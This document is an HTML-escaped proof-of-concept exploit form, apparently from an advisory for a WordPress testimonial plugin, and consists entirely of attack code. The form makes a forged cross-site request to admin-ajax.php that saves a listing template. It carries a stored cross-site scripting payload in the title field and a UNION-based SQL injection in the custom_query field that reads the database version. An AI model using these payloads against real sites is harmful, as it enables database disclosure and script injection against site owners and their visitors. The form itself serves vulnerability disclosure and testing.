&lt;form name=&quot;testimonial_add&quot; method=&quot;post&quot; action=&quot;http://www.example.com/wp-admin/admin-ajax.php&quot;;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;iNIC_testimonial_save_listing_template&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;9&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;title&quot; value=&quot;&lt;script&gt;alert(String.fromCharCode(67,83,82,70,32,49))&lt;/script&gt;&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;no_of_testimonial&quot; value=&quot;5&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;list_per_page&quot; value=&quot;5&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;ord_by&quot; value=&quot;id&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;ord_type&quot; value=&quot;ASC&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;custom_query&quot; value=&quot;1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;show_featured_at&quot; value=&quot;top&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;no_of_featured&quot; value=&quot;2&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;featured_template&quot; value=&quot;{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} 
{#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;listing_template_odd&quot; value=&quot;{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} 
{#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;listing_template_even&quot; value=&quot;{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} 
{#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}&quot;&gt;
    &lt;input type=&quot;submit&quot; value=&quot;Add Template&quot;&gt;
&lt;/form&gt;
